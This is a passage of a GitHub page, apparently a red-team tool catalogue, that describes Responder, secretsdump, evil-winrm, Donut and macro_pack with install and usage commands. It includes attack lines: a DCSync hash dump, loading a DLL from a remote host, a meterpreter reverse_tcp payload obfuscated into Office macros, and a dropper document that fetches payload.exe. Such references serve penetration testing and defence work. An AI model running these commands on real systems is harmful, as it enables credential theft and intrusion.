overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh \u0026amp;\u0026amp; \\\nsudo bash ./install.sh\"\u003e\u003cpre\u003ewget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh \u003cspan class=\"pl-k\"\u003e\u0026amp;\u0026amp;\u003c/span\u003e \\\nsudo bash ./install.sh\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOnce King Phisher has been installed please follow the \u003ca href=\"https://github.com/rsmusllp/king-phisher/wiki/Getting-Started\"\u003ewiki page\u003c/a\u003e to setup SSH, Database config, SMTP server etc.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/208217377-a6d36613-4ffe-486d-a630-99ed1bb7ed2d.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/208217377-a6d36613-4ffe-486d-a630-99ed1bb7ed2d.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eExecution\u003c/h1\u003e\u003ca id=\"user-content-execution\" class=\"anchor\" aria-label=\"Permalink: Execution\" href=\"#execution\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/SpiderLabs/Responder\"\u003eResponder\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-responder\" class=\"anchor\" aria-label=\"Permalink: 🔙Responder\" href=\"#responder\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eResponder is a tool for poisoning the LLMNR and NBT-NS protocols on a network, to allow for credential capture and arbitrary code execution.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) protocols are used by Windows systems to resolve hostnames to IP addresses on a local network. If a hostname cannot be resolved using these protocols, the system will broadcast a request for the hostname to the local network.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eResponder listens for these broadcasts and responds with a fake IP address, tricking the requesting system into sending its credentials to the attacker.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/SpiderLabs/Responder#usage\ncd Responder\"\u003e\u003cpre\u003egit clone https://github.com/SpiderLabs/Responder#usage\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e Responder\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Running the tool\n./Responder.py [options]\n\n# Typical usage\n./Responder.py -I eth0 -wrf\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Running the tool\u003c/span\u003e\n./Responder.py [options]\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Typical usage\u003c/span\u003e\n./Responder.py -I eth0 -wrf\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found \u003ca href=\"https://github.com/SpiderLabs/Responder#usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210266150-b9cbd4a0-d07b-435a-8fa9-bc0b88d2c6ae.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210266150-b9cbd4a0-d07b-435a-8fa9-bc0b88d2c6ae.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/\" rel=\"nofollow\"\u003ehttps://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/fortra/impacket/blob/master/examples/secretsdump.py\"\u003esecretsdump\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-secretsdump\" class=\"anchor\" aria-label=\"Permalink: 🔙secretsdump\" href=\"#secretsdump\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA utility that is part of the Impacket library that can be used to extract password hashes and other secrets from a Windows system.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt does this by interacting with the Security Account Manager (SAM) database on the system and extracting the hashed passwords and other information, such as:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003ePassword hashes for local accounts\u003c/li\u003e\n\u003cli\u003eKerberos tickets and keys\u003c/li\u003e\n\u003cli\u003eLSA Secrets\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"python3 -m pip install impacket\"\u003e\u003cpre\u003epython3 -m pip install impacket\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Extract NTLM hashes with local files\nsecretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL\n\n# DCSync attack and dump the NTLM hashes of all domain users.\nsecretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Extract NTLM hashes with local files\u003c/span\u003e\nsecretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e DCSync attack and dump the NTLM hashes of all domain users.\u003c/span\u003e\nsecretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210266110-8f60d6e8-009a-4dea-9e33-8a712aeaf2ac.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210266110-8f60d6e8-009a-4dea-9e33-8a712aeaf2ac.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy\" rel=\"nofollow\"\u003ehttps://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/Hackplayers/evil-winrm\"\u003eevil-winrm\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-evil-winrm\" class=\"anchor\" aria-label=\"Permalink: 🔙evil-winrm\" href=\"#evil-winrm\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eEvil-WinRM is a tool that provides a command line interface for Windows Remote Management (WinRM: \u003cem\u003eA service that allows administrators to remotely execute commands on a Windows machine\u003c/em\u003e).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eEvil-WinRM allows an attacker to remotely connect to a Windows machine using WinRM and execute arbitrary commands.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSome features include:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eLoading in memory Powershell scripts\u003c/li\u003e\n\u003cli\u003eLoading in memory dll files bypassing some AVs\u003c/li\u003e\n\u003cli\u003eLoading x64 payloads\u003c/li\u003e\n\u003cli\u003ePass-the-hash support\u003c/li\u003e\n\u003cli\u003eUploading and downloading local and remote files\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Git)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo gem install winrm winrm-fs stringio logger fileutils\ngit clone https://github.com/Hackplayers/evil-winrm.git\ncd evil-winrm\"\u003e\u003cpre\u003esudo gem install winrm winrm-fs stringio logger fileutils\ngit clone https://github.com/Hackplayers/evil-winrm.git\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e evil-winrm\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Ruby gem)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"gem install evil-winrm\"\u003e\u003cpre\u003egem install evil-winrm\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eAlternative installation instructions can be found \u003ca href=\"https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations\nevil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'\n\n# Upload local files to victim\nupload local_filename\nupload local_filename destination_filename\n\n# Download remote files to local machine\ndownload remote_filename\ndownload remote_filename destination_filename\n\n# Execute .Net assembly into victim memory\nInvoke-Binary /opt/csharp/Rubeus.exe\n\n# Load DLL library into victim memory\nDll-Loader -http http://10.10.10.10/SharpSploit.dll\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations\u003c/span\u003e\nevil-winrm -i 192.168.1.100 -u Administrator -p \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003eMySuperSecr3tPass123!\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e -s \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e/home/foo/ps1_scripts/\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e -e \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e/home/foo/exe_files/\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Upload local files to victim\u003c/span\u003e\nupload local_filename\nupload local_filename destination_filename\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Download remote files to local machine\u003c/span\u003e\ndownload remote_filename\ndownload remote_filename destination_filename\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Execute .Net assembly into victim memory\u003c/span\u003e\nInvoke-Binary /opt/csharp/Rubeus.exe\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Load DLL library into victim memory\u003c/span\u003e\nDll-Loader -http http://10.10.10.10/SharpSploit.dll\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage documentation can be found \u003ca href=\"https://github.com/Hackplayers/evil-winrm#documentation\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210266192-ad53c125-7b3b-4a91-89c1-01c42cb21ef3.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210266192-ad53c125-7b3b-4a91-89c1-01c42cb21ef3.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://korbinian-spielvogel.de/posts/heist-writeup/\" rel=\"nofollow\"\u003ehttps://korbinian-spielvogel.de/posts/heist-writeup/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/TheWover/donut/\"\u003eDonut\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-donut\" class=\"anchor\" aria-label=\"Permalink: 🔙Donut\" href=\"#donut\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA tool for in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. It can be used to load and run custom payloads on target systems without the need to drop files to disk.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Windows)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone http://github.com/thewover/donut.git\"\u003e\u003cpre\u003egit clone http://github.com/thewover/donut.git\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eTo generate the loader template, dynamic library donut.dll, the static library donut.lib and the generator donut.exe. Start an x64 Microsoft Visual Studio Developer Command Prompt, change to the directory where you cloned the Donut repository and enter the following:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"nmake -f Makefile.msvc\"\u003e\u003cpre\u003enmake -f Makefile.msvc\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eTo do the same, except using MinGW-64 on Windows or Linux, change to the directory where you cloned the Donut repository and enter the following:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"make -f Makefile.mingw\"\u003e\u003cpre\u003emake -f Makefile.mingw\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Linux)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"pip3 install donut-shellcode\"\u003e\u003cpre\u003epip3 install donut-shellcode\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Creating shellcode from an XSL file that pops up a calculator.\nshellcode = donut.create(file=r\u0026quot;C:\\\\Tools\\\\Source\\\\Repos\\\\donut\\\\calc.xsl\u0026quot;)\n\n# Creating shellcode from an unmanaged DLL. Invokes DLLMain.\nshellcode = donut.create(file=r\u0026quot;C:\\Tools\\Source\\Repos\\donut\\payload\\test\\hello.dll\u0026quot;)\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Creating shellcode from an XSL file that pops up a calculator.\u003c/span\u003e\nshellcode = donut.create(file=r\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eC:\u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003eTools\u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003eSource\u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003eRepos\u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003edonut\u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003ecalc.xsl\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e)\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Creating shellcode from an unmanaged DLL. Invokes DLLMain.\u003c/span\u003e\nshellcode = donut.create(file=r\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eC:\\Tools\\Source\\Repos\\donut\\payload\\test\\hello.dll\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e)\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFor full usage information, see the donut \u003ca href=\"https://github.com/TheWover/donut/#4-usage\"\u003eGitHub Page\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSee \u003ca href=\"https://thewover.github.io/Bear-Claw/\" rel=\"nofollow\"\u003ea recent blog post\u003c/a\u003e from The Wover for more info.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210077893-9d42cc2f-0ea0-414f-8103-42e29429321b.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210077893-9d42cc2f-0ea0-414f-8103-42e29429321b.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/sevagas/macro_pack\"\u003eMacro_pack\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-macro_pack\" class=\"anchor\" aria-label=\"Permalink: 🔙Macro_pack\" href=\"#macro_pack\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA tool used to automatize the obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for red teaming.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Binary)\u003c/strong\u003e\u003c/p\u003e\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eGet the latest binary from \u003ca href=\"https://github.com/sevagas/macro_pack/releases/\"\u003ehttps://github.com/sevagas/macro_pack/releases/\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDownload binary on PC with genuine Microsoft Office installed.\u003c/li\u003e\n\u003cli\u003eOpen console, CD to binary dir and call the binary\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Git)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/sevagas/macro_pack.git\ncd macro_pack\npip3 install -r requirements.txt\"\u003e\u003cpre\u003egit clone https://github.com/sevagas/macro_pack.git\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e macro_pack\npip3 install -r requirements.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Help Page\npython3 macro_pack.py --help\n\n# List all supported file formats\nmacro_pack.exe --listformats\n# Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba\n\n# Obfuscate Empire stager VBA file and generate a MS Word document:\nmacro_pack.exe -f empire.vba -o -G myDoc.docm\n\n# Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)\necho \u0026quot;https://myurl.url/payload.exe\u0026quot; \u0026quot;dropped.exe\u0026quot; | macro_pack.exe -o -t DROPPER -G \u0026quot;drop.xlsm\u0026quot; \n\n# Execute calc.exe via Dynamic Data Exchange (DDE) attack\necho calc.exe | macro_pack.exe --dde -G calc.xslx\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Help Page\u003c/span\u003e\npython3 macro_pack.py --help\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e List all supported file formats\u003c/span\u003e\nmacro_pack.exe --listformats\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.\u003c/span\u003e\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e macro_pack.exe -o -G meterobf.vba\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Obfuscate Empire stager VBA file and generate a MS Word document:\u003c/span\u003e\nmacro_pack.exe -f empire.vba -o -G myDoc.docm\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)\u003c/span\u003e\n\u003cspan class=\"pl-c1\"\u003eecho\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ehttps://myurl.url/payload.exe\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e \u003cspan 